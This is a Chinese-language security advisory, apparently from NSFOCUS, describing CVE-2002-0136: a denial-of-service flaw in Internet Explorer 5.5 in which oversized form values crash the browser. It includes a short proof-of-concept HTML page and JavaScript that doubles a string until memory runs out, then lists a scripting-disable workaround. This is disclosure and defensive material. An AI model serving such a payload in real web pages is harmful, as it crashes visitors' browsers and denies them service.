安全研究

安全漏洞
Microsoft IE表单拒绝服务漏洞

发布日期:2002-01-16
更新日期:2002-01-16

受影响系统:
Microsoft Internet Explorer 5.5
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5SP2
    - Microsoft Windows Terminal Services
    - Microsoft Windows Terminal Server 4.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows ME
    - Microsoft Windows Enterprise Server 4.0
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
描述:
BUGTRAQ  ID: 3892
CVE(CAN) ID: CVE-2002-0136

微软的Internet Explorer存在问题,这个问题可能可以让浏览恶意网页的用户的系统引起拒绝服务。

当HTML表单的值(如input, textarea的值)填充了巨大的数据,当用户浏览该页面时将引起用户系统拒绝服务。

<*来源:Ivan Sergio Borgonovo (mail@gorilla.it
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-01/0199.html
        http://archives.neohapsis.com/archives/bugtraq/2002-01/0257.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Ivan Sergio Borgonovo (mail@gorilla.it)提供了如下测试方法:
-- begin test.html --
<html><title></title>
<body>
<script language="JavaScript" src="t.js"></script>
<FORM NAME="IEDos" METHOD="POST" ACTION="./">
<IMG SRC="1.gif" width='10' height='10' border='0' onLoad="FillTA(TA)">
<input type="text" name="TA" value="">
</FORM>
</body>
</html>

-- end test.html --

-- begin t.js --
<!--
function FillTA(obj) {
    v="a";
    for(i=0;i<100000000;i++) {
        v=v+v;
    };
     obj.value=v;
    return;
}
//-->

-- begin t.js --

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 设置IE,禁止Java脚本和活动脚本的执行。
  选择:“工具”->“Internet 选项...”->“安全”->“Internet”(或者其他区域,例如“本地Intranet”、“受信任的站点”)
  点击“自定义级别”,在“安全设置”中选择“脚本”->“活动脚本”,将其属性改为“禁用”,按“确定”保存设置。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/

浏览次数:3330
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障